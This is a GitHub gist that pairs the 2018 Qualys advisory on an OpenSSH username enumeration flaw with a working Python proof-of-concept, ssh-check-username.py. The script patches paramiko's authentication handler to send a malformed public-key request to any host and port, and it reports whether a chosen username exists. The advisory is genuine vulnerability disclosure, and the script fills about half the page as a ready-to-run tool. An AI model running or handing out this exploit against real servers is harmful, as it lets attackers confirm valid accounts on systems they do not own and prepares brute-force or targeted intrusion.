Skip to content

Instantly share code, notes, and snippets.

@steeve85

steeve85/OpenSSH Username Enumeration

Last active September 7, 2018 09:41
Show Gist options
  • Save steeve85/a44168b0f80413ce077356adc2a8681a to your computer and use it in GitHub Desktop.
Save steeve85/a44168b0f80413ce077356adc2a8681a to your computer and use it in GitHub Desktop.
Download ZIP
OpenSSH Username Enumeration
Raw
OpenSSH Username Enumeration
http://www.openwall.com/lists/oss-security/2018/08/15/5
Date: Wed, 15 Aug 2018 09:05:58 -0700
From: Qualys Security Advisory <qsa@...lys.com>
To: oss-security@...ts.openwall.com
Subject: OpenSSH Username Enumeration
Hi all,
We sent the following email to openssh@...nssh.com and
distros@...openwall.org about an hour ago, and it was decided that we
should send it to oss-security@...ts.openwall.com right away (as far as
we know, no CVE has been assigned to this issue yet):
========================================================================
While reviewing the latest OpenSSH commits, we stumbled across:
https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
Date: Tue Jul 31 03:10:27 2018 +0000
delay bailout for invalid authenticating user until after the packet
containing the request has been fully parsed. Reported by Dariusz Tytko
and Michal Sajdak; ok deraadt
We realized that without this patch, a remote attacker can easily test
whether a certain user exists or not (username enumeration) on a target
OpenSSH server:
87 static int
88 userauth_pubkey(struct ssh *ssh)
89 {
...
101 if (!authctxt->valid) {
102 debug2("%s: disabled because of invalid user", __func__);
103 return 0;
104 }
105 if ((r = sshpkt_get_u8(ssh, &have_sig)) != 0 ||
106 (r = sshpkt_get_cstring(ssh, &pkalg, NULL)) != 0 ||
107 (r = sshpkt_get_string(ssh, &pkblob, &blen)) != 0)
108 fatal("%s: parse request failed: %s", __func__, ssh_err(r));
The attacker can try to authenticate a user with a malformed packet (for
example, a truncated packet), and:
- if the user is invalid (it does not exist), then userauth_pubkey()
returns immediately, and the server sends an SSH2_MSG_USERAUTH_FAILURE
to the attacker;
- if the user is valid (it exists), then sshpkt_get_u8() fails, and the
server calls fatal() and closes its connection to the attacker.
We believe that this issue warrants a CVE; it affects all operating
systems, all OpenSSH versions (we went back as far as OpenSSH 2.3.0,
released in November 2000), and is easier to exploit than previous
OpenSSH username enumerations (which were all timing attacks):
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210
We also believe that this should be posted to oss-security right away:
the issue (commit) is already public, and if we spotted it, then others
(not so well intentioned) did too. We are at your disposal for
questions, comments, and further discussions.
Thank you very much! With best regards,
--
the Qualys Security Advisory team
Raw
ssh-check-username.py
#!/usr/bin/env python
# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import argparse
import logging
import paramiko
import socket
import sys
class InvalidUsername(Exception):
pass
def add_boolean(*args, **kwargs):
pass
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
def userauth_failure(*args, **kwargs):
raise InvalidUsername()
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()
sock = socket.socket()
try:
sock.connect((args.hostname, args.port))
except socket.error:
print '[-] Failed to connect'
sys.exit(1)
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[-] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print '[*] Invalid username'
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print '[+] Valid username'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment